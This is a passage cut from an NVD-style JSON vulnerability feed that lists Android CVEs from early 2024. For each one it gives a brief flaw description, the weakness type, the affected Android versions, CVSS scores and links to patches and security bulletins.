"https://android.googlesource.com/platform/packages/modules/Permission/+/8141e8f4dd77b9f8fb485e23ddf028c57fcd4fca", "name" : "https://android.googlesource.com/platform/packages/modules/Permission/+/8141e8f4dd77b9f8fb485e23ddf028c57fcd4fca", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-05-01", "name" : "https://source.android.com/security/bulletin/2024-05-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-05-01", "name" : "https://source.android.com/security/bulletin/2024-05-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In multiple locations, there is a possible notification listener grant to an app running in the work profile due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-05-07T21:15Z", "lastModifiedDate" : "2025-03-29T00:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0044", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-74" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/65bd134b0a82c51a143b89821d5cdd00ddc31792", "name" : "https://android.googlesource.com/platform/frameworks/base/+/65bd134b0a82c51a143b89821d5cdd00ddc31792", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/836750619a8bce0bf78fe0549f9990e294671563", "name" : "https://android.googlesource.com/platform/frameworks/base/+/836750619a8bce0bf78fe0549f9990e294671563", "refsource" : "", "tags" : [ ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/954b2874b85b6cd0d6bb12cd677cdf22e5dbd77b", "name" : "https://android.googlesource.com/platform/frameworks/base/+/954b2874b85b6cd0d6bb12cd677cdf22e5dbd77b", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-m7fh-f3w4-r6v2", "name" : "https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-m7fh-f3w4-r6v2", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery.html", "name" : "https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Not Applicable" ] }, { "url" : "https://source.android.com/security/bulletin/2024-10-01", "name" : "https://source.android.com/security/bulletin/2024-10-01", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In createSessionInternal of PackageInstallerService.java, there is a possible run-as any app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 6.7, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 0.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-11T17:15Z", "lastModifiedDate" : "2025-01-28T20:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0045", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-125" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/7d0f696f450241d8ba7a168ba14fa7b75032f0c9", "name" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/7d0f696f450241d8ba7a168ba14fa7b75032f0c9", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/7d0f696f450241d8ba7a168ba14fa7b75032f0c9", "name" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/7d0f696f450241d8ba7a168ba14fa7b75032f0c9", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In smp_proc_sec_req of smp_act.cc, there is a possible out of bounds read due to improper input validation. This could lead to remote (proximal/adjacent) information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "ADJACENT_NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-03-11T17:15Z", "lastModifiedDate" : "2024-12-17T15:41Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0046", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/d68cab5ac1aa294ec4d0419bc0803a5577e4e43c", "name" : "https://android.googlesource.com/platform/frameworks/base/+/d68cab5ac1aa294ec4d0419bc0803a5577e4e43c", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/d68cab5ac1aa294ec4d0419bc0803a5577e4e43c", "name" : "https://android.googlesource.com/platform/frameworks/base/+/d68cab5ac1aa294ec4d0419bc0803a5577e4e43c", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In installExistingPackageAsUser of InstallPackageHelper.java, there is a possible carrier restriction bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-11T17:15Z", "lastModifiedDate" : "2024-12-16T19:50Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0047", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/3cd8a2c783fc736627b38f639fe4e239abcf6af1", "name" : "https://android.googlesource.com/platform/frameworks/base/+/3cd8a2c783fc736627b38f639fe4e239abcf6af1", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/3cd8a2c783fc736627b38f639fe4e239abcf6af1", "name" : "https://android.googlesource.com/platform/frameworks/base/+/3cd8a2c783fc736627b38f639fe4e239abcf6af1", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/bd5cc7f03256b328438b9bc3791c6b811a2f1f17", "name" : "https://android.googlesource.com/platform/frameworks/base/+/bd5cc7f03256b328438b9bc3791c6b811a2f1f17", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/bd5cc7f03256b328438b9bc3791c6b811a2f1f17", "name" : "https://android.googlesource.com/platform/frameworks/base/+/bd5cc7f03256b328438b9bc3791c6b811a2f1f17", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/f516739398746fef7e0cf1437d9a40e2ad3c10bb", "name" : "https://android.googlesource.com/platform/frameworks/base/+/f516739398746fef7e0cf1437d9a40e2ad3c10bb", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/f516739398746fef7e0cf1437d9a40e2ad3c10bb", "name" : "https://android.googlesource.com/platform/frameworks/base/+/f516739398746fef7e0cf1437d9a40e2ad3c10bb", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In writeUserLP of UserManagerService.java, device policies are serialized with an incorrect tag due to a logic error in the code. This could lead to local denial of service when policies are deserialized on reboot with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-03-11T17:15Z", "lastModifiedDate" : "2025-03-27T16:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0048", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/2c236cde5505ee0e88cf1e3d073e2f1a53f0eede", "name" : "https://android.googlesource.com/platform/frameworks/base/+/2c236cde5505ee0e88cf1e3d073e2f1a53f0eede", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/2c236cde5505ee0e88cf1e3d073e2f1a53f0eede", "name" : "https://android.googlesource.com/platform/frameworks/base/+/2c236cde5505ee0e88cf1e3d073e2f1a53f0eede", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In Session of AccountManagerService.java, there is a possible method to retain foreground service privileges due to incorrect handling of null responses. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-11T17:15Z", "lastModifiedDate" : "2024-12-16T19:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0049", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/av/+/462689f06fd5e72ac63cd87b43ee52554ddf953e", "name" : "https://android.googlesource.com/platform/frameworks/av/+/462689f06fd5e72ac63cd87b43ee52554ddf953e", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/av/+/462689f06fd5e72ac63cd87b43ee52554ddf953e", "name" : "https://android.googlesource.com/platform/frameworks/av/+/462689f06fd5e72ac63cd87b43ee52554ddf953e", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In multiple locations, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-11T17:15Z", "lastModifiedDate" : "2024-12-16T19:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0050", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/av/+/8f3bc8be16480367bac36effa25706133a0dc22d", "name" : "https://android.googlesource.com/platform/frameworks/av/+/8f3bc8be16480367bac36effa25706133a0dc22d", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/av/+/8f3bc8be16480367bac36effa25706133a0dc22d", "name" : "https://android.googlesource.com/platform/frameworks/av/+/8f3bc8be16480367bac36effa25706133a0dc22d", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In getConfig of SoftVideoDecoderOMXComponent.cpp, there is a possible out of bounds write due to a missing validation check. This could lead to a local non-security issue with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-11T17:15Z", "lastModifiedDate" : "2024-12-16T19:38Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0051", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/av/+/a52c14a5b49f26efafa581dea653b4179d66909e", "name" : "https://android.googlesource.com/platform/frameworks/av/+/a52c14a5b49f26efafa581dea653b4179d66909e", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/av/+/a52c14a5b49f26efafa581dea653b4179d66909e", "name" : "https://android.googlesource.com/platform/frameworks/av/+/a52c14a5b49f26efafa581dea653b4179d66909e", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In onQueueFilled of SoftMPEG4.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-11T17:15Z", "lastModifiedDate" : "2024-12-16T19:32Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0052", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/packages/modules/HealthFitness/+/178f4824574fdf33ed4ac584d092240d1c771b04", "name" : "https://android.googlesource.com/platform/packages/modules/HealthFitness/+/178f4824574fdf33ed4ac584d092240d1c771b04", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://android.googlesource.com/platform/packages/modules/HealthFitness/+/178f4824574fdf33ed4ac584d092240d1c771b04", "name" : "https://android.googlesource.com/platform/packages/modules/HealthFitness/+/178f4824574fdf33ed4ac584d092240d1c771b04", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In multiple functions of healthconnect, there is a possible leakage of exercise route data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 3.3, "baseSeverity" : "LOW" }, "exploitabilityScore" : 1.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-03-11T17:15Z", "lastModifiedDate" : "2025-03-13T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0053", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/74b03835a7fac15e854d08159922418c99e27e77", "name" : "https://android.googlesource.com/platform/frameworks/base/+/74b03835a7fac15e854d08159922418c99e27e77", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/74b03835a7fac15e854d08159922418c99e27e77", "name" : "https://android.googlesource.com/platform/frameworks/base/+/74b03835a7fac15e854d08159922418c99e27e77", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In getCustomPrinterIcon of PrintManagerService.java, there is a possible way to view other user's images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : 